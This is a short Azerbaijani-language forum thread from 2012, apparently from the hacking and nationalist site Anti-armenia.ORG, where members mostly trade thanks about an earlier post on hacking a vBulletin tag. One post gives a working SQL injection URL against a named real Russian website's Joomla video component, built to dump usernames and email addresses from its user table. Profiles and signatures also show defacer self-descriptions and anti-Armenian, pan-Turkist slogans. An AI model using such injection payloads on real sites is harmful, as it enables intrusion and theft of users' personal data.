Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Vbulletin forumunda HIDE təqinin hacklanması mənim mövzum idi))) sağ ol ki plaqiat eləmədin və əvvəlcədən qeyd etdin ki mövzü götürmədi)

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2012-04-03 13:27 GMT                 

Grov



İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkür Avatar..

Anti-armenia.ORG
    

Istifadəçi
    2012-04-03 14:14 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Hamınıza Təşəkkür Mr.Opil Bu Fikrin Üzrə Fikirləşəcəm))))

ID:HAcKER Təşəkkürlər Qaqa

K0K4!N Aha Paylaşsan Sevinərəm...

StealtH Aha Qeyd edirəm... Plagiat-danda Xoşum gəlmir müəllifinin əziyyətin qiymətləndirmişəç Həmişə )))) Təşəkkür

Grov Dəyməz Buyur

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-04-29 20:49 GMT                 

Bot



İstifadəçi
Mesaj Sayı : 44
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 38
Mesaj :

Mövzunu Paylaş!


Avatar təşəkkür. Bütün əziyyəti keçən insanlara təşəkkür.

Nöqtə boyda xeyrinə görə vergül kimi əyilənlər düz xətt kimi tapdalanmağa məhkumdurlar.
Anti-armenia.ORG
    

Istifadəçi
    2012-05-03 10:43 GMT                 

Batyam



İstifadəçi
Mesaj Sayı : 2
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


sql format sql format (0x3a5f,username,0x3a,email,0x5f3a)

[url]http://www.pm-tm.ru/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,group_concat(0x3a5f,username,0x3a,email,0x5f3a),13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--[/url]

Anti-armenia.ORG
    

Istifadəçi
    2012-05-03 16:16 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Batyam ,
Nə demək istədiyini anlamadım açıq yaz...

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-05-03 18:40 GMT                 

xakker95



İstifadəçi
Mesaj Sayı : 7
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkür

[img]"C:\Documents and Settings\ADMIN\Рабочий стол\images.jpeg"[/img]
Anti-armenia.ORG